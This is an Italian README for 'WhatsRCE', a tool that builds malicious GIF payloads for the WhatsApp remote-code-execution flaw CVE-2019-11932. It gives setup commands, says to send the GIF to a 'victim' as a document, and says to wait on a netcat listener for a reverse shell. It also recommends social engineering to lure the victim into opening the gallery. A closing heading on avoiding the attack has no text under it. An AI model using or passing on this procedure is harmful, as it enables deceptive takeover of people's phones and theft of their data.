WhatsRCE
Questo è un generatore automatico di payload per CVE-2019-11932 (Esecuzione Remota di Codice su WhatsApp)
- Installazione automatica di GCC (comando innocuo, puoi vedere che è open-source)
- Salvataggio in file .GIF
Come usarlo ?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
Come ottenere la shell ?
- Invia semplicemente il file .GIF alla vittima COME DOCUMENTO E NON COME IMMAGINE
- E imposta nc / netcat sulla porta che hai impostato negli strumenti WhatsRCE {nc -lnvp your_port}
- Puoi usare l'attacco di ingegneria sociale così le vittime possono essere attratte a lanciare questo exploit
- di' alla vittima di aprire la galleria tramite WhatsApp e di inviare qualsiasi foto (non serve, basta che apra la galleria, nessun problema); dopo qualche secondo riceverai una connessione shell dalla vittima
oppure guarda questo
VIDEO DIMOSTRATIVO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
se il link sopra non è accessibile
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
Come evitare questo attacco?